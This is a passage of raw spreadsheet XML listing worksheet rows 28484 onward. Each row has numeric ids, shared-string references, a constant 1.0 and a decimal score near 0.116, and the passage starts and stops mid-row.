      <c r="E28484" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28484" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="28485" ht="15.75" customHeight="1">
      <c r="A28485" s="1">
        <v>21992.0</v>
      </c>
      <c r="B28485" s="2">
        <v>2.9506893E7</v>
      </c>
      <c r="C28485" s="2" t="s">
        <v>27377</v>
      </c>
      <c r="D28485" s="2">
        <v>1.0</v>
      </c>
      <c r="E28485" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28485" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="28486" ht="15.75" customHeight="1">
      <c r="A28486" s="1">
        <v>23269.0</v>
      </c>
      <c r="B28486" s="2">
        <v>5329395.0</v>
      </c>
      <c r="C28486" s="2" t="s">
        <v>27378</v>
      </c>
      <c r="D28486" s="2">
        <v>1.0</v>
      </c>
      <c r="E28486" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28486" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="28487" ht="15.75" customHeight="1">
      <c r="A28487" s="1">
        <v>28916.0</v>
      </c>
      <c r="B28487" s="2">
        <v>2.9506892E7</v>
      </c>
      <c r="C28487" s="2" t="s">
        <v>27377</v>
      </c>
      <c r="D28487" s="2">
        <v>1.0</v>
      </c>
      <c r="E28487" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28487" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="28488" ht="15.75" customHeight="1">
      <c r="A28488" s="1">
        <v>34005.0</v>
      </c>
      <c r="B28488" s="2">
        <v>9486641.0</v>
      </c>
      <c r="C28488" s="2" t="s">
        <v>27379</v>
      </c>
      <c r="D28488" s="2">
        <v>1.0</v>
      </c>
      <c r="E28488" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28488" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="28489" ht="15.75" customHeight="1">
      <c r="A28489" s="1">
        <v>13034.0</v>
      </c>
      <c r="B28489" s="2">
        <v>3.2974887E7</v>
      </c>
      <c r="C28489" s="2" t="s">
        <v>27380</v>
      </c>
      <c r="D28489" s="2">
        <v>1.0</v>
      </c>
      <c r="E28489" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28489" s="2">
        <v>0.1164383561643836</v>
      </c>
    </row>
    <row r="28490" ht="15.75" customHeight="1">
      <c r="A28490" s="1">
        <v>1662.0</v>
      </c>
      <c r="B28490" s="2">
        <v>2.8184155E7</v>
      </c>
      <c r="C28490" s="2" t="s">
        <v>27381</v>
      </c>
      <c r="D28490" s="2">
        <v>1.0</v>
      </c>
      <c r="E28490" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28490" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28491" ht="15.75" customHeight="1">
      <c r="A28491" s="1">
        <v>2794.0</v>
      </c>
      <c r="B28491" s="2">
        <v>3.5259688E7</v>
      </c>
      <c r="C28491" s="2" t="s">
        <v>27382</v>
      </c>
      <c r="D28491" s="2">
        <v>1.0</v>
      </c>
      <c r="E28491" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28491" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28492" ht="15.75" customHeight="1">
      <c r="A28492" s="1">
        <v>2820.0</v>
      </c>
      <c r="B28492" s="2">
        <v>3.538905E7</v>
      </c>
      <c r="C28492" s="2" t="s">
        <v>27383</v>
      </c>
      <c r="D28492" s="2">
        <v>1.0</v>
      </c>
      <c r="E28492" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28492" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28493" ht="15.75" customHeight="1">
      <c r="A28493" s="1">
        <v>4405.0</v>
      </c>
      <c r="B28493" s="2">
        <v>4.228093E7</v>
      </c>
      <c r="C28493" s="2" t="s">
        <v>27384</v>
      </c>
      <c r="D28493" s="2">
        <v>1.0</v>
      </c>
      <c r="E28493" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28493" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28494" ht="15.75" customHeight="1">
      <c r="A28494" s="1">
        <v>4869.0</v>
      </c>
      <c r="B28494" s="2">
        <v>4.3826149E7</v>
      </c>
      <c r="C28494" s="2" t="s">
        <v>27385</v>
      </c>
      <c r="D28494" s="2">
        <v>1.0</v>
      </c>
      <c r="E28494" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28494" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28495" ht="15.75" customHeight="1">
      <c r="A28495" s="1">
        <v>5072.0</v>
      </c>
      <c r="B28495" s="2">
        <v>4.4422353E7</v>
      </c>
      <c r="C28495" s="2" t="s">
        <v>27386</v>
      </c>
      <c r="D28495" s="2">
        <v>1.0</v>
      </c>
      <c r="E28495" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28495" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28496" ht="15.75" customHeight="1">
      <c r="A28496" s="1">
        <v>5524.0</v>
      </c>
      <c r="B28496" s="2">
        <v>4.5873124E7</v>
      </c>
      <c r="C28496" s="2" t="s">
        <v>27387</v>
      </c>
      <c r="D28496" s="2">
        <v>1.0</v>
      </c>
      <c r="E28496" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28496" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28497" ht="15.75" customHeight="1">
      <c r="A28497" s="1">
        <v>5548.0</v>
      </c>
      <c r="B28497" s="2">
        <v>4.5934592E7</v>
      </c>
      <c r="C28497" s="2" t="s">
        <v>27388</v>
      </c>
      <c r="D28497" s="2">
        <v>1.0</v>
      </c>
      <c r="E28497" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28497" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28498" ht="15.75" customHeight="1">
      <c r="A28498" s="1">
        <v>5624.0</v>
      </c>
      <c r="B28498" s="2">
        <v>4.6186959E7</v>
      </c>
      <c r="C28498" s="2" t="s">
        <v>27389</v>
      </c>
      <c r="D28498" s="2">
        <v>1.0</v>
      </c>
      <c r="E28498" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28498" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28499" ht="15.75" customHeight="1">
      <c r="A28499" s="1">
        <v>6238.0</v>
      </c>
      <c r="B28499" s="2">
        <v>4.8080532E7</v>
      </c>
      <c r="C28499" s="2" t="s">
        <v>27390</v>
      </c>
      <c r="D28499" s="2">
        <v>1.0</v>
      </c>
      <c r="E28499" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28499" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28500" ht="15.75" customHeight="1">
      <c r="A28500" s="1">
        <v>10718.0</v>
      </c>
      <c r="B28500" s="2">
        <v>1.5037134E7</v>
      </c>
      <c r="C28500" s="2" t="s">
        <v>27391</v>
      </c>
      <c r="D28500" s="2">
        <v>1.0</v>
      </c>
      <c r="E28500" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28500" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28501" ht="15.75" customHeight="1">
      <c r="A28501" s="1">
        <v>10887.0</v>
      </c>
      <c r="B28501" s="2">
        <v>1.6538297E7</v>
      </c>
      <c r="C28501" s="2" t="s">
        <v>27392</v>
      </c>
      <c r="D28501" s="2">
        <v>1.0</v>
      </c>
      <c r="E28501" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28501" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28502" ht="15.75" customHeight="1">
      <c r="A28502" s="1">
        <v>11527.0</v>
      </c>
      <c r="B28502" s="2">
        <v>2.2448001E7</v>
      </c>
      <c r="C28502" s="2" t="s">
        <v>27393</v>
      </c>
      <c r="D28502" s="2">
        <v>1.0</v>
      </c>
      <c r="E28502" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28502" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28503" ht="15.75" customHeight="1">
      <c r="A28503" s="1">
        <v>12078.0</v>
      </c>
      <c r="B28503" s="2">
        <v>2.6671871E7</v>
      </c>
      <c r="C28503" s="2" t="s">
        <v>27394</v>
      </c>
      <c r="D28503" s="2">
        <v>1.0</v>
      </c>
      <c r="E28503" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28503" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28504" ht="15.75" customHeight="1">
      <c r="A28504" s="1">
        <v>12318.0</v>
      </c>
      <c r="B28504" s="2">
        <v>2.8444078E7</v>
      </c>
      <c r="C28504" s="2" t="s">
        <v>27395</v>
      </c>
      <c r="D28504" s="2">
        <v>1.0</v>
      </c>
      <c r="E28504" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28504" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28505" ht="15.75" customHeight="1">
      <c r="A28505" s="1">
        <v>12383.0</v>
      </c>
      <c r="B28505" s="2">
        <v>2.8841007E7</v>
      </c>
      <c r="C28505" s="2" t="s">
        <v>27396</v>
      </c>
      <c r="D28505" s="2">
        <v>1.0</v>
      </c>
      <c r="E28505" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28505" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28506" ht="15.75" customHeight="1">
      <c r="A28506" s="1">
        <v>12574.0</v>
      </c>
      <c r="B28506" s="2">
        <v>2.9996443E7</v>
      </c>
      <c r="C28506" s="2" t="s">
        <v>27397</v>
      </c>
      <c r="D28506" s="2">
        <v>1.0</v>
      </c>
      <c r="E28506" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28506" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28507" ht="15.75" customHeight="1">
      <c r="A28507" s="1">
        <v>12654.0</v>
      </c>
      <c r="B28507" s="2">
        <v>3.0405197E7</v>
      </c>
      <c r="C28507" s="2" t="s">
        <v>27398</v>
      </c>
      <c r="D28507" s="2">
        <v>1.0</v>
      </c>
      <c r="E28507" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28507" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28508" ht="15.75" customHeight="1">
      <c r="A28508" s="1">
        <v>12687.0</v>
      </c>
      <c r="B28508" s="2">
        <v>3.0702778E7</v>
      </c>
      <c r="C28508" s="2" t="s">
        <v>27399</v>
      </c>
      <c r="D28508" s="2">
        <v>1.0</v>
      </c>
      <c r="E28508" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28508" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28509" ht="15.75" customHeight="1">
      <c r="A28509" s="1">
        <v>12932.0</v>
      </c>
      <c r="B28509" s="2">
        <v>3.2335718E7</v>
      </c>
      <c r="C28509" s="2" t="s">
        <v>27400</v>
      </c>
      <c r="D28509" s="2">
        <v>1.0</v>
      </c>
      <c r="E28509" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28509" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28510" ht="15.75" customHeight="1">
      <c r="A28510" s="1">
        <v>13074.0</v>
      </c>
      <c r="B28510" s="2">
        <v>3.3337086E7</v>
      </c>
      <c r="C28510" s="2" t="s">
        <v>27401</v>
      </c>
      <c r="D28510" s="2">
        <v>1.0</v>
      </c>
      <c r="E28510" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28510" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28511" ht="15.75" customHeight="1">
      <c r="A28511" s="1">
        <v>13721.0</v>
      </c>
      <c r="B28511" s="2">
        <v>3.6327968E7</v>
      </c>
      <c r="C28511" s="2" t="s">
        <v>27402</v>
      </c>
      <c r="D28511" s="2">
        <v>1.0</v>
      </c>
      <c r="E28511" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28511" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28512" ht="15.75" customHeight="1">
      <c r="A28512" s="1">
        <v>14519.0</v>
      </c>
      <c r="B28512" s="2">
        <v>3.9780151E7</v>
      </c>
      <c r="C28512" s="2" t="s">
        <v>27403</v>
      </c>
      <c r="D28512" s="2">
        <v>1.0</v>
      </c>
      <c r="E28512" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28512" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28513" ht="15.75" customHeight="1">
      <c r="A28513" s="1">
        <v>14952.0</v>
      </c>
      <c r="B28513" s="2">
        <v>4.1318615E7</v>
      </c>
      <c r="C28513" s="2" t="s">
        <v>27404</v>
      </c>
      <c r="D28513" s="2">
        <v>1.0</v>
      </c>
      <c r="E28513" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28513" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28514" ht="15.75" customHeight="1">
      <c r="A28514" s="1">
        <v>15712.0</v>
      </c>
      <c r="B28514" s="2">
        <v>4.3967815E7</v>
      </c>
      <c r="C28514" s="2" t="s">
        <v>27405</v>
      </c>
      <c r="D28514" s="2">
        <v>1.0</v>
      </c>
      <c r="E28514" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28514" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28515" ht="15.75" customHeight="1">
      <c r="A28515" s="1">
        <v>15915.0</v>
      </c>
      <c r="B28515" s="2">
        <v>4.4658159E7</v>
      </c>
      <c r="C28515" s="2" t="s">
        <v>27406</v>
      </c>
      <c r="D28515" s="2">
        <v>1.0</v>
      </c>
      <c r="E28515" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28515" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28516" ht="15.75" customHeight="1">
      <c r="A28516" s="1">
        <v>16367.0</v>
      </c>
      <c r="B28516" s="2">
        <v>4.614392E7</v>
      </c>
      <c r="C28516" s="2" t="s">
        <v>27407</v>
      </c>
      <c r="D28516" s="2">
        <v>1.0</v>
      </c>
      <c r="E28516" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28516" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28517" ht="15.75" customHeight="1">
      <c r="A28517" s="1">
        <v>16433.0</v>
      </c>
      <c r="B28517" s="2">
        <v>4.6336403E7</v>
      </c>
      <c r="C28517" s="2" t="s">
        <v>27408</v>
      </c>
      <c r="D28517" s="2">
        <v>1.0</v>
      </c>
      <c r="E28517" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28517" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28518" ht="15.75" customHeight="1">
      <c r="A28518" s="1">
        <v>16942.0</v>
      </c>
      <c r="B28518" s="2">
        <v>4.8208685E7</v>
      </c>
      <c r="C28518" s="2" t="s">
        <v>27409</v>
      </c>
      <c r="D28518" s="2">
        <v>1.0</v>
      </c>
      <c r="E28518" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28518" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28519" ht="15.75" customHeight="1">
      <c r="A28519" s="1">
        <v>18788.0</v>
      </c>
      <c r="B28519" s="2">
        <v>5.3827503E7</v>
      </c>
      <c r="C28519" s="2" t="s">
        <v>27410</v>
      </c>
      <c r="D28519" s="2">
        <v>1.0</v>
      </c>
      <c r="E28519" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28519" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28520" ht="15.75" customHeight="1">
      <c r="A28520" s="1">
        <v>20690.0</v>
      </c>
      <c r="B28520" s="2">
        <v>1.4518021E7</v>
      </c>
      <c r="C28520" s="2" t="s">
        <v>27411</v>
      </c>
      <c r="D28520" s="2">
        <v>1.0</v>
      </c>
      <c r="E28520" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28520" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28521" ht="15.75" customHeight="1">
      <c r="A28521" s="1">
        <v>21261.0</v>
      </c>
      <c r="B28521" s="2">
        <v>2.0045054E7</v>
      </c>
      <c r="C28521" s="2" t="s">
        <v>27412</v>
      </c>
      <c r="D28521" s="2">
        <v>1.0</v>
      </c>
      <c r="E28521" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28521" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28522" ht="15.75" customHeight="1">
      <c r="A28522" s="1">
        <v>21916.0</v>
      </c>
      <c r="B28522" s="2">
        <v>2.8190353E7</v>
      </c>
      <c r="C28522" s="2" t="s">
        <v>27413</v>
      </c>
      <c r="D28522" s="2">
        <v>1.0</v>
      </c>
      <c r="E28522" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28522" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28523" ht="15.75" customHeight="1">
      <c r="A28523" s="1">
        <v>21927.0</v>
      </c>
      <c r="B28523" s="2">
        <v>2.8448829E7</v>
      </c>
      <c r="C28523" s="2" t="s">
        <v>27414</v>
      </c>
      <c r="D28523" s="2">
        <v>1.0</v>
      </c>
      <c r="E28523" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28523" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28524" ht="15.75" customHeight="1">
      <c r="A28524" s="1">
        <v>22304.0</v>
      </c>
      <c r="B28524" s="2">
        <v>3.3680776E7</v>
      </c>
      <c r="C28524" s="2" t="s">
        <v>27415</v>
      </c>
      <c r="D28524" s="2">
        <v>1.0</v>
      </c>
      <c r="E28524" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28524" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28525" ht="15.75" customHeight="1">
      <c r="A28525" s="1">
        <v>22585.0</v>
      </c>
      <c r="B28525" s="2">
        <v>3.9018358E7</v>
      </c>
      <c r="C28525" s="2" t="s">
        <v>27416</v>
      </c>
      <c r="D28525" s="2">
        <v>1.0</v>
      </c>
      <c r="E28525" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28525" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28526" ht="15.75" customHeight="1">
      <c r="A28526" s="1">
        <v>22729.0</v>
      </c>
      <c r="B28526" s="2">
        <v>4.3954147E7</v>
      </c>
      <c r="C28526" s="2" t="s">
        <v>27417</v>
      </c>
      <c r="D28526" s="2">
        <v>1.0</v>
      </c>
      <c r="E28526" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28526" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28527" ht="15.75" customHeight="1">
      <c r="A28527" s="1">
        <v>22751.0</v>
      </c>
      <c r="B28527" s="2">
        <v>4.4492851E7</v>
      </c>
      <c r="C28527" s="2" t="s">
        <v>27418</v>
      </c>
      <c r="D28527" s="2">
        <v>1.0</v>
      </c>
      <c r="E28527" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28527" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28528" ht="15.75" customHeight="1">
      <c r="A28528" s="1">
        <v>23475.0</v>
      </c>
      <c r="B28528" s="2">
        <v>5.722178E7</v>
      </c>
      <c r="C28528" s="2" t="s">
        <v>27419</v>
      </c>
      <c r="D28528" s="2">
        <v>1.0</v>
      </c>
      <c r="E28528" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28528" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28529" ht="15.75" customHeight="1">
      <c r="A28529" s="1">
        <v>24440.0</v>
      </c>
      <c r="B28529" s="2">
        <v>1.089644E7</v>
      </c>
      <c r="C28529" s="2" t="s">
        <v>27420</v>
      </c>
      <c r="D28529" s="2">
        <v>1.0</v>
      </c>
      <c r="E28529" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28529" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28530" ht="15.75" customHeight="1">
      <c r="A28530" s="1">
        <v>25642.0</v>
      </c>
      <c r="B28530" s="2">
        <v>1.451802E7</v>
      </c>
      <c r="C28530" s="2" t="s">
        <v>27411</v>
      </c>
      <c r="D28530" s="2">
        <v>1.0</v>
      </c>
      <c r="E28530" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28530" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28531" ht="15.75" customHeight="1">
      <c r="A28531" s="1">
        <v>25798.0</v>
      </c>
      <c r="B28531" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C28531" s="2" t="s">
        <v>27421</v>
      </c>
      <c r="D28531" s="2">
        <v>1.0</v>
      </c>
      <c r="E28531" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28531" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28532" ht="15.75" customHeight="1">
      <c r="A28532" s="1">
        <v>28096.0</v>
      </c>
      <c r="B28532" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C28532" s="2" t="s">
        <v>27422</v>
      </c>
      <c r="D28532" s="2">
        <v>1.0</v>
      </c>
      <c r="E28532" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28532" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28533" ht="15.75" customHeight="1">
      <c r="A28533" s="1">
        <v>28357.0</v>
      </c>
      <c r="B28533" s="2">
        <v>2.5959383E7</v>
      </c>
      <c r="C28533" s="2" t="s">
        <v>27423</v>
      </c>
      <c r="D28533" s="2">
        <v>1.0</v>
      </c>
      <c r="E28533" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28533" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28534" ht="15.75" customHeight="1">
      <c r="A28534" s="1">
        <v>29735.0</v>
      </c>
      <c r="B28534" s="2">
        <v>3.4571795E7</v>
      </c>
      <c r="C28534" s="2" t="s">
        <v>27424</v>
      </c>
      <c r="D28534" s="2">
        <v>1.0</v>
      </c>
      <c r="E28534" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28534" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28535" ht="15.75" customHeight="1">
      <c r="A28535" s="1">
        <v>30768.0</v>
      </c>
      <c r="B28535" s="2">
        <v>4.449285E7</v>
      </c>
      <c r="C28535" s="2" t="s">
        <v>27418</v>
      </c>
      <c r="D28535" s="2">
        <v>1.0</v>
      </c>
      <c r="E28535" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28535" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28536" ht="15.75" customHeight="1">
      <c r="A28536" s="1">
        <v>32613.0</v>
      </c>
      <c r="B28536" s="2">
        <v>5828025.0</v>
      </c>
      <c r="C28536" s="2" t="s">
        <v>27425</v>
      </c>
      <c r="D28536" s="2">
        <v>1.0</v>
      </c>
      <c r="E28536" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28536" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28537" ht="15.75" customHeight="1">
      <c r="A28537" s="1">
        <v>32880.0</v>
      </c>
      <c r="B28537" s="2">
        <v>6341236.0</v>
      </c>
      <c r="C28537" s="2" t="s">
        <v>27426</v>
      </c>
      <c r="D28537" s="2">
        <v>1.0</v>
      </c>
      <c r="E28537" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28537" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28538" ht="15.75" customHeight="1">
      <c r="A28538" s="1">
        <v>33109.0</v>
      </c>
      <c r="B28538" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C28538" s="2" t="s">
        <v>27427</v>
      </c>
      <c r="D28538" s="2">
        <v>1.0</v>
      </c>
      <c r="E28538" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28538" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="28539" ht="15.75" customHeight="1">
      <c r="A28539" s="1">
        <v>3058.0</v>
      </c>
      <c r="B28539" s="2">
        <v>3.6506302E7</v>
      </c>
      <c r="C28539" s="2" t="s">
        <v>27428</v>
      </c>
      <c r="D28539" s="2">
        <v>1.0</v>
      </c>
      <c r="E28539" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28539" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="28540" ht="15.75" customHeight="1">
      <c r="A28540" s="1">
        <v>12467.0</v>
      </c>
      <c r="B28540" s="2">
        <v>2.9408032E7</v>
      </c>
      <c r="C28540" s="2" t="s">
        <v>27429</v>
      </c>
      <c r="D28540" s="2">
        <v>1.0</v>
      </c>
      <c r="E28540" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28540" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="28541" ht="15.75" customHeight="1">
      <c r="A28541" s="1">
        <v>27417.0</v>
      </c>
      <c r="B28541" s="2">
        <v>2.182634E7</v>
      </c>
      <c r="C28541" s="2" t="s">
        <v>27430</v>
      </c>
      <c r="D28541" s="2">
        <v>1.0</v>
      </c>
      <c r="E28541" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28541" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="28542" ht="15.75" customHeight="1">
      <c r="A28542" s="1">
        <v>5297.0</v>
      </c>
      <c r="B28542" s="2">
        <v>4.5221941E7</v>
      </c>
      <c r="C28542" s="2" t="s">
        <v>27431</v>
      </c>
      <c r="D28542" s="2">
        <v>1.0</v>
      </c>
      <c r="E28542" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28542" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="28543" ht="15.75" customHeight="1">
      <c r="A28543" s="1">
        <v>13088.0</v>
      </c>
      <c r="B28543" s="2">
        <v>3.3386363E7</v>
      </c>
      <c r="C28543" s="2" t="s">
        <v>27432</v>
      </c>
      <c r="D28543" s="2">
        <v>1.0</v>
      </c>
      <c r="E28543" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28543" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="28544" ht="15.75" customHeight="1">
      <c r="A28544" s="1">
        <v>599.0</v>
      </c>
      <c r="B28544" s="2">
        <v>1.9224762E7</v>
      </c>
      <c r="C28544" s="2" t="s">
        <v>27433</v>
      </c>
      <c r="D28544" s="2">
        <v>1.0</v>
      </c>
      <c r="E28544" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28544" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="28545" ht="15.75" customHeight="1">
      <c r="A28545" s="1">
        <v>3054.0</v>
      </c>
      <c r="B28545" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C28545" s="2" t="s">
        <v>27434</v>
      </c>
      <c r="D28545" s="2">
        <v>1.0</v>
      </c>
      <c r="E28545" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28545" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="28546" ht="15.75" customHeight="1">
      <c r="A28546" s="1">
        <v>9242.0</v>
      </c>
      <c r="B28546" s="2">
        <v>5.5466815E7</v>
      </c>
      <c r="C28546" s="2" t="s">
        <v>27435</v>
      </c>
      <c r="D28546" s="2">
        <v>1.0</v>
      </c>
      <c r="E28546" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28546" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="28547" ht="15.75" customHeight="1">
      <c r="A28547" s="1">
        <v>20004.0</v>
      </c>
      <c r="B28547" s="2">
        <v>5.7721527E7</v>
      </c>
      <c r="C28547" s="2" t="s">
        <v>27436</v>
      </c>
      <c r="D28547" s="2">
        <v>1.0</v>
      </c>
      <c r="E28547" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28547" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="28548" ht="15.75" customHeight="1">
      <c r="A28548" s="1">
        <v>8475.0</v>
      </c>
      <c r="B28548" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C28548" s="2" t="s">
        <v>27437</v>
      </c>
      <c r="D28548" s="2">
        <v>1.0</v>
      </c>
      <c r="E28548" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28548" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="28549" ht="15.75" customHeight="1">
      <c r="A28549" s="1">
        <v>7580.0</v>
      </c>
      <c r="B28549" s="2">
        <v>5.1592497E7</v>
      </c>
      <c r="C28549" s="2" t="s">
        <v>27438</v>
      </c>
      <c r="D28549" s="2">
        <v>1.0</v>
      </c>
      <c r="E28549" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28549" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28550" ht="15.75" customHeight="1">
      <c r="A28550" s="1">
        <v>7927.0</v>
      </c>
      <c r="B28550" s="2">
        <v>5.2572289E7</v>
      </c>
      <c r="C28550" s="2" t="s">
        <v>27439</v>
      </c>
      <c r="D28550" s="2">
        <v>1.0</v>
      </c>
      <c r="E28550" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28550" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="28551" ht="15.75" customHeight="1">
      <c r="A28551" s="1">
        <v>8840.0</v>
      </c>
      <c r="B28551" s="2">
        <v>5.4691682E7</v>
      </c>
      <c r="C28551" s="2" t="s">
        <v>27440</v>
      </c>
      <c r="D28551" s="2">
        <v>1.0</v>
      </c>
